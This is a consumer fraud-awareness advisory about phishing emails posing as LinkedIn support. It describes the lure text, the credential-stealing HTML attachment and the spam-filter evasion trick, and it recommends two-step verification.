Researchers at Symantec have warned of a new wave of phishing emails claiming to come from LinkedIn’s support team that evade spam filters.
A typical email reads: “Due to irregular activities your Linkedln account has been subjected to compulsory security update. Linkedln may sometimes deny logins in cases where we believe the account could have been compromised.
To do this we developed a new secure way that keeps your account safe. we have attached a form to this email to complete the process. Please, download and follow the instructions on your screen.
Linkedln Support”.
Attached to the email is an HTML file, which contains a copy of the genuine LinkedIn webpage, however, the website’s source has been modified, so if the recipient uses this web page to sign in to their LinkedIn account, their credentials will be sent directly to the fraudsters.
Passing through spam filters
The email uses a lowercase I instead of a capital i when spelling “LinkedIn”. The difference in characters is indiscernible to the eye and functions as a way to evade spam mail filters.
Independent security expert Graham Cluley said: “Once the phishers have control of the account they can pose more convincingly as a member of your organisation, and potentially abuse the business relationships the victim has built up over time for their own criminal and fraudulent purposes.
After all, people are far more likely to trust a message which arrives in their LinkedIn inbox with a friend or colleague’s mugshot and work profile alongside it, than one which arrives out of the blue in their email intray”.
Two step verification
LinkedIn users should consider turning on two-step verification, a true “security update” that provides an extra layer of security. With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to login without having access to the user’s mobile phone.
You can find out more about LinkedIn’s two-step verification by visiting its help center.
Read more on the Symantec website.
Please note: Action Fraud is not responsible for the content on external websites.
If you are a victim of fraud you can call Action Fraud on 0300 123 2040 or use our online fraud reporting tool and receive a police crime reference number.